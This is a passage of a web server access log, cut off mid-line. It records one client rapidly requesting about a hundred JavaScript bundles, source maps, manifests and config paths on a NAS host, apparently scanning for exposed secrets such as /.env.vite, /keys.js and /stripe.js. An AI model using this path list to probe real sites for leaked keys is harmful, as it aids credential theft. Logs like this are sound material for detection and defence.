+[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/index.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/app/root.tsx" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/api.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/keys.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/payment.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/stripe.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/bundle.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/static/js/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/vendor.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/runtime.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/dist/bundle.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/dist/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/bundle.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/static/js/bundle.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/js/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/js/bundle.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/js/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/js/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/bundle.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/js/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/js/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/js/config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/chunk.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/index.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/dist/bundle.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/dist/app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/static/js/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/bundle.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/index.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/js/app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_nuxt/app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/js/main.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_nuxt/app.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/runtime-main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/main.chunk.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/config/env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/config/index.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/config/keys.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/src/env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/src/config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/__ENV.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/lib/config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/src/constants.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/env-config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/window.env.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/config.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/env.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/keys.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/index.html" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/payment" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/checkout" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/subscribe" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/asset-manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/asset-manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/serviceworker.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/service-worker.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/workbox.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 403 403 - GET https nas.profibot.hu "/.vite/manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/webpack.runtime.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/3.chunk.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/4.chunk.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/static/js/5.chunk.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/vendor.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/api/config.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/config" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 403 403 - GET https nas.profibot.hu "/.vite/deps/_metadata.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 403 403 - GET https nas.profibot.hu "/.env.vite" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/vite.config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/vite.config.ts" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/root.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/build/entry.client.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/app/entry.client.tsx" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_astro/page.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/astro.config.mjs" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 403 403 - GET https nas.profibot.hu "/.astro/types.d.ts" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/page-data/app-data.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/runtime~main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/index.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/assets/main.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/@vite/client" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/svelte.config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/src/env.d.ts" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/build/manifest.json" 